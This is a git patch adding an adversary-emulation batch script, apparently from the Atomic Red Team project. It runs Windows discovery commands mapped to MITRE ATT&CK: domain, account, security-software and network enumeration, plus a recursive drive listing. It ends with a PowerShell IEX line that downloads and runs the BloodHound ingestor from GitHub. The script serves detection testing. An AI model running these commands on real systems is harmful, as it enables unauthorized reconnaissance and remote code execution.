From 61d4797e64718b31cc282a00e8046532f9213790 Mon Sep 17 00:00:00 2001
From: Michael Haag
 <“mike@redcanary.com  git config --global user.name “Michael Haag>
Date: Mon, 13 Nov 2017 11:01:57 -0700
Subject: [PATCH] Chain Reaction

+ New chain reaction
---
 .../Chain_Reactions/chain_reaction_02.bat     | 56 +++++++++++++++++++
 1 file changed, 56 insertions(+)
 create mode 100644 ARTifacts/Chain_Reactions/chain_reaction_02.bat

diff --git a/ARTifacts/Chain_Reactions/chain_reaction_02.bat b/ARTifacts/Chain_Reactions/chain_reaction_02.bat
new file mode 100644
index 0000000..b5889e3
--- /dev/null
+++ b/ARTifacts/Chain_Reactions/chain_reaction_02.bat
@@ -0,0 +1,56 @@
+:: Chain Reaction 02
+::
+:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
+:: NOTE We recommend executing from a server that you control.
+:: NOTE Thank You :)
+::
+:: This particular Chain Reaction focuses on enumeration.
+
+:: Tactic: Discovery
+:: Technique: Remote System Discovery https://attack.mitre.org/wiki/Technique/T1018
+:: Change IP scheme for your environment
+
+:: for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i > ping_output.txt
+
+net.exe view
+
+net.exe view /domain
+
+:: Tactic: Discovery
+:: Technique: Account Discovery https://attack.mitre.org/wiki/Windows_Technique_Matrix
+
+net localgroup "administrators"
+
+wmic useraccount get /ALL
+
+
+:: Tactic: Discovery
+:: Technique: Security Software Discovery https://attack.mitre.org/wiki/Technique/T1063
+
+netsh.exe advfirewall firewall show all profiles
+
+tasklist.exe | findstr cb
+
+tasklist.exe | findstr virus
+
+tasklist.exe | findstr defender
+
+:: Execution
+
+:: Tactic: Discovery
+:: Technique: System Network Configuration Discovery https://attack.mitre.org/wiki/Technique/T1016
+
+ipconfig /all
+arp -a
+nbtstat -n
+
+:: Tactic: Discovery
+:: Technique: File and Directory Discovery https://attack.mitre.org/wiki/Technique/T1083
+
+dir /s c:\ >> %temp%\download
+
+:: Tactic: Execution
+:: Technique: Powershell https://attack.mitre.org/wiki/Technique/T1086
+:: Download and invoke BloodHound Ingestor
+
+powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-BloodHoundData"